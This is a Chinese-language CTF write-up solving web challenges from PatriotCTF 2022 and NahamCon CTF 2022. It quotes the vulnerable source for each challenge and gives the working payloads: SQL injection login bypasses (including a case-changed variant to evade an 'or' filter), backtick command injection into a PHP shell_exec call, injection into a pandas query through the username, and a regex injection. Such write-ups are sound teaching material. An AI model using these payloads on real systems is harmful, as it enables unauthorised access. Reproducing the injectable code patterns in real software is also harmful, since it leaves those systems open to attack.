PatriotCTF 2022 + NahamCon CTF 2022 部分wp
PatriotCTF 2022
https://ctftime.org/event/1616/tasks/
被队友取证题带飞了(
web
Rock and Roll
Inspector Clouseau
Apocalypse Security - 1
username=1&password=1' or '1'='1
Apocalypse Security - 2
过滤了or,大写绕过即可
username=a&password=1'+Or+'1'%3d'1
Spongebob
给了main.php源码
<?php
$text = $_POST['text'];
$command = "python3.9 memetext.py \"$text\"";
$out = shell_exec($command);
echo $out;
?>
fuzz出来的``可以用
text=`ls`
转为小写然后访问这张图片
PctF{SPoNGebOb_LOokiNG_ThICC}
ps,本来我想管道符构造的,但是不行,自己本地试了一下
有可能是被识别为两个参数然后报错了?
Locked
我隐隐约约有一种感觉,出题人真的很喜欢在跳转和资源加载处做文章……
扫描到有个/admin/index.html,一步步抓包放包
访问pastebin.com/F21q9Eu8,瞅见flag
Excellent Database
给了源码,大概就是用excel当作数据库,dataframe存取数据
def add_user(username, password):
DB = load_workbook(filename="db.xlsx")
Users = DB["Users"]
new_row = Users.max_row + 1
Users[f"{USERNAMES}{new_row}"] = username
Users[f"{PASSWORDS}{new_row}"] = password
DB.save(filename="db.xlsx")
def read_db() -> pd.DataFrame:
subprocess.Popen(["libreoffice", "--headless", "--convert-to", "csv", "db.xlsx"], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT).communicate()
df = pd.read_csv("db.csv")
return df
看看发现利用点在这段
@app.route("/", methods=["POST", "GET"])
def base():
if not session.get("username"):
return redirect(url_for("login"))
else:
Users = read_db()
username = session.get("username") //登陆后会根据session中的username,把密码取出显示在前端
password = Users.query(f"Username == '{username}'")["Password"].values[0]
return render_template('index.html', name=username, password=password)
所以构造用户名
admin' and Username == 'admin
# password = Users.query(f"Username == 'admin' and Username == 'admin'")["Password"].values[0]
/signup注册,得到admin密码SuperStrongPassword
admin用户登陆以后访问/admin得到flag
NahamCon CTF 2022
web
Personnel
给了源码,关键是这句
results = re.findall(r"[A-Z][a-z]*?" + name + r"[a-z]*?\n", users, setting)
|或拼接正则
setting=0&name=|.*|
